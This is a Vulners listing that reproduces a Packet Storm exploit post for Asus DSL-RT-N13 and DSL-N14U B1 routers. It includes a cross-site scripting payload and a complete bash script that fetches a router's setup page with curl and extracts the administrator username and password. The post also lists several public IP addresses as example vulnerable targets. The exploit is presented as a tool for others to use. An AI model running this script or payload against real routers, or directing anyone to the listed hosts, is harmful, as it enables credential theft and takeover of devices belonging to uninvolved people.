Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Asus Router Cross Site Script / Authentication Bypass

🗓️ 26 Jan 2018 00:00:00Reported by 4TT4CK3RType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 54 Views

Asus Routers Vulnerability - Cross Site Script & Authentication Bypas

Code
`In the name of god  
-------------------------  
  
  
Exploit Title :  
--------------------  
Asus Routers (DSL-RT-N13 , DSL-N14U B1) Vulnerability  
  
  
Exploit Author :  
---------------------  
4TT4CK3R  
  
  
Category :  
---------------------  
Remote and Local  
  
  
Home Page :  
---------------------  
https://asus.com  
  
  
Google Dork :  
---------------------  
None  
  
  
Models that Vulnerable in here :  
---------------------------------------------  
-) DSL-RT-N13 > Bypass Authentication Vulnerability  
-) DSL-N14U B1 > Cross Site Scripting Vulnerability  
  
  
  
[##] DSL-N14U B1 Cross Site Scripting Vulnerability  
--------------------------------------------------------------  
This vulnerability works on target remote and local ip address.  
Payload : ""><script>alert(window.location)</script>  
Vulnerable Page : Main Page  
Screenshot :  
http://uupload.ir/files/az1i_shot.png  
  
  
  
[##] DSL-RT-N13U Bypass Authentication Vulnerability  
---------------------------------------------------------------  
With this vulnerability we can find administrator username and password and  
login into admin panel of asus router model DSL-RT-N13.  
Exploit source of this vulnerability (ARE Script):  
  
#!/bin/bash  
# Asus Routers Exploit (ARE)  
# Coded by : 4TT4CK3R  
# Category : Local and Remote  
# Reuirements : Opening ports 80,8080,443  
# Models that affecta : DSL-RT N13  
reset  
dir = "/opt/"  
rm -rf /opt/a.htm  
clear  
echo ""  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo  
echo ""  
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"  
echo ""  
echo -e "\e[93m [+] Tool name: Asus Router Exploit\e[0m"  
echo -e "\e[93m [+] Models that affecta : DSL-RT N13 \e[0m"  
echo -e "\e[93m [+] Coded by: 4TT4CK3R\e[0m"  
echo ""  
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo  
echo ""  
echo ""  
echo -e "\e[93m Options Of Tool: "  
echo ""  
echo " 1. Start"  
echo " 2. About"  
echo " 3. Exit"  
echo ""  
read -p " Please choose an option: " option  
echo ""  
echo ""  
if [ $option == "2" ]  
then  
clear  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done  
; echo  
echo ""  
echo " [+] About this tool :"  
echo ""  
echo -e " Hi dear friend ... This tool is an asus router exploiter.  
This tool working with an vulnerability on Asus Routers and we can  
using  
this tool for bypass authentication and exploit the router config  
panel.  
Also this tool working on DSL-RT N13 models of asus company.  
Thanks for using this tool and my exploit."  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done  
; echo  
echo ""  
echo ""  
elif [ $option == "3" ]  
then  
clear  
exit  
elif [ $option == "1" ]  
then  
clear  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;  
done ; echo  
echo ""  
echo " [+] Starting Steps "  
echo ""  
echo ""  
read -p " [++] Please enter target ip (ex: 5.2.5.5) : " ip  
echo ""  
read -p " [++] Please enter port number (ex: 8080) : " port  
echo ""  
read -p " [++] Please enter protocol (http or https) : " protocol  
echo ""  
echo " [**] Ok, Please wait ... "  
echo ""  
curl --silent $protocol://$ip:$port/QIS_wizard.htm > $dir/a.htm  
echo ""  
echo " [**] Searching data ..."  
echo ""  
cat $dir/a.htm | grep "http_username" | cut -d " " -f4 | cut -d '"'  
-f2 > $dir/user  
cat $dir/a.htm | grep "http_passwd" | cut -d " " -f4 | cut -d '"'  
-f2 > $dir/pass  
username=$(<$dir/user)  
password=$(<$dir/pass)  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;  
done ; echo  
echo ""  
echo " [>>] Address : $protocol://$ip:$port"  
echo " [>>] Username : $username"  
echo " [>>] Password : $password"  
echo ""  
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;  
done ; echo  
echo ""  
else  
clear  
echo ""  
echo " [+] Wrong selection. exiting ..."  
sleep 2  
exit  
fi  
exit  
  
  
Video demo of this tool :  
-----------------------------------  
https://www.videosprout.com/video?id=be9d22de-6871-4521-96be-1c6def8c2cce  
  
  
Other routers for example DSL-RT N13 model :  
-------------------------------------------------  
http://94.190.36.152  
http://88.86.198.149:8080  
http://220.133.187.27:8080  
  
  
Other routers for example DSL-N14U B1 model :  
-------------------------------------------------  
http://80.188.231.233:8080  
http://197.89.27.160:8080  
  
  
Exploited by :  
--------------------  
4TT4CK3R  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jan 2018 00:00Current
7.1High risk
Vulners AI Score7.1
asusroutervulnerabilitycross site scriptingauthentication bypassdsl-rt-n13dsl-n14u b1remotelocalexploit4tt4ck3radmin panelexploit source
54